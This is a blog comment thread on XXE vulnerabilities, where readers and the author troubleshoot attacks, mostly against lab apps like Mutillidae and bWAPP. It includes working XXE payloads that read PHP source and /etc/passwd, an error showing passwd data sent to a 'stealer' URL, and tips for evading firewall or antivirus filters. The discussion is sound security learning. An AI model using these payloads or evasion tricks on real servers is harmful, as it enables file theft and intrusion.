Comments on h3xStream's blog: Identifying Xml eXternal Entity vulnerability (XXE)
Blog author: Philippe Arteau (http://www.blogger.com/profile/12830184811509526452)
Comment feed last updated 2023-12-01; comments below are in chronological order (oldest first).

Kamil Vavra (2014-06-28):
Thank you for this writeup. You can also read .php source code, for example:

    <!DOCTYPE trk [
    <!ENTITY entity SYSTEM "php://filter/convert.base64-encode/resource=index.php">
    ]>
    <gpx creator="GPS Visualizer http://www.gpsvisualizer.com/" version="1.0">
      <trk>
        <name>&entity;</name>
        <trkseg>
          <trkpt lat="45.4431641" lon="-121.7295456"></trkpt>
          <trkpt lat="45.4428615" lon="-121.7290800"></trkpt>
          <trkpt lat="45.4425697" lon="-121.7279085"></trkpt>
        </trkseg>
      </trk>
    </gpx>

adrian is (2014-08-29):
Hi! I am trying this on Mutillidae. I am using http rather than gopher to send the file:///etc/passwd, but I got this error: "Invalid URI: https://localhost/stealer/indexs.php?token=root:x:0:0"

Philippe Arteau (2014-09-13):
Have you tried the PHP base64 filter? See Kamil's comment for a quick example.

eleven (2015-01-01):
Hi, great article. I'm trying the same technique, but the uploader's response was that the file contains a virus, and it rejects it. Do you know of a way to evade this form of protection?

Philippe Arteau (2015-01-01):
Interesting.. I would try to detect if this is an antivirus, a web application firewall or a custom filter from the application.

A few things to try:
1. Try an empty doctype (if it fails again, the parser probably throws an exception to the application when any doctype is specified).
2. Try to submit an EICAR test file or similar obviously malicious binaries.
3. Try upper-case variations on keywords, encoding variations, etc. (WAF bypass)
4. Try pointing an entity to a domain name for which you control the DNS server (see if the host gets resolved).

Alicia (2015-01-08):
Is there a way to test this technique locally? Do you know a vulnerable application that I can install locally and test with? Many thanks.

Kamil Vavra (2015-01-08):
Here you are: http://pastebin.com/dtZf8FfX

Philippe Arteau (2015-02-01):
"Identifier is not initialized" may refer to your entity not being loaded. Make sure your resource path (resource=/...) points to a _file_.

    php://filter/convert.base64-encode/resource=/var/www/vhosts/SiteOnServer/httpdocs/index.php

The directory listing trick will only work on Java applications.

Good luck!

adrian is (2015-06-15):
This comment has been removed by the author.

adrian is (2015-06-15):
This comment has been removed by the author.

Philippe Arteau (2015-06-15):
Can you upload your XML files to a site like pastebin or GitHub gist?

Philippe Arteau (2015-06-15):
The URL is most likely invalid because of the newline character placed right after the first line of text.
Have you tried the base64 encoder trick? See Kamil's comment above. It is only possible in a PHP environment.

Anonymous (2016-03-07):
I have used your application which was mentioned, and also bWAPP and Mutillidae; I always get a parse error in simplexml_load_file(). The vulnerable application is making a connection to my server, but when it tries to parse the dtd/xml file it shows an error. Can you please help me resolve this? I could not figure out what I am doing wrong.

This is the error output:

    Warning: simplexml_load_file(): xxe.xml:4: parser error : xmlParsePEReference: no name in /Applications/XAMPP/xamppfiles/htdocs/xxe.php on line 5
    Warning: simplexml_load_file(): % dtd;]> in /Applications/XAMPP/xamppfiles/htdocs/xxe.php on line 5
    Warning: simplexml_load_file(): ^ in /Applications/XAMPP/xamppfiles/htdocs/xxe.php on line 5
    Warning: simplexml_load_file(): xxe.xml:4: parser error : internal error in /Applications/XAMPP/xamppfiles/htdocs/xxe.php on line 5
    Warning: simplexml_load_file(): % dtd;]> in /Applications/XAMPP/xamppfiles/htdocs/xxe.php on line 5
    Warning: simplexml_load_file(): ^ in /Applications/XAMPP/xamppfiles/htdocs/xxe.php on line 5
    Warning: simplexml_load_file(): xxe.xml:4: parser error : DOCTYPE improperly terminated in /Applications/XAMPP/xamppfiles/htdocs/xxe.php on line 5
    Warning: simplexml_load_file(): % dtd;]> in /Applications/XAMPP/xamppfiles/htdocs/xxe.php on line 5
    Warning: simplexml_load_file(): ^ in /Applications/XAMPP/xamppfiles/htdocs/xxe.php on line 5
    Warning: simplexml_load_file(): xxe.xml:4: parser error : Start tag expected, '<' not found in /Applications/XAMPP/xamppfiles/htdocs/xxe.php on line 5
    Warning: simplexml_load_file(): % dtd;]> in /Applications/XAMPP/xamppfiles/htdocs/xxe.php on line 5
    Warning: simplexml_load_file(): ^ in /Applications/XAMPP/xamppfiles/htdocs/xxe.php on line 5
    Notice: Trying to get property of non-object in /Applications/XAMPP/xamppfiles/htdocs/xxe.php on line 6
    Warning: Invalid argument supplied for foreach() in /Applications/XAMPP/xamppfiles/htdocs/xxe.php on line 6